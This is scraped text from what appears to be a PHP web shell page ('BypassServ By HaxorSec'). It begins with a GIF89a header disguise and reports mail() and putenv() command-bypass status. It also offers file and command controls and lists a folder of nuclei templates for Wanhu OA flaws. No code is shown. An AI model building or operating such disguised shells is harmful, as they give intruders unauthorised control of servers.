GIF89a; ;; BypassServ By HaxorSec
[ Command Bypas Status Wajib ON MAIL PUTENV @ HaxorSec]
[ mail() : [ ON ] ] [ mb_send_mail() : [ ON ] ] [ error_log() : [ ON ] ] [ imap_mail() : [ ON ] ][ Function putenv() ] : [ ON ]

DIR: //home/phir/nuclei-templates/http/vulnerabilities/wanhu / [ GO Home ]



Command BYPASS
Command BIASA
Create Folder
Create File

Item Name
Size
Date
Permissions
View
Delete
Rename
. 4096 2025-12-19 08:38:32 0700
.. 4096 2025-12-19 08:38:32 0700
wanhu-documentedit-sqli.yaml 1404 2025-12-19 08:38:32 0755
wanhu-download-ftp-file-read.yaml 1230 2025-12-19 08:38:32 0755
wanhu-download-old-file-read.yaml 1226 2025-12-19 08:38:32 0755
wanhu-oa-fileupload-controller-arbitrary-file-upload.yaml 2309 2025-12-19 08:38:32 0755
wanhu-teleconferenceservice-xxe.yaml 1647 2025-12-19 08:38:32 0755
wanhuoa-downloadservlet-lfi.yaml 1493 2025-12-19 08:38:32 0664
wanhuoa-officeserverservlet-file-upload.yaml 1027 2025-12-19 08:38:32 0755
wanhuoa-smartupload-file-upload.yaml 1495 2025-12-19 08:38:32 0755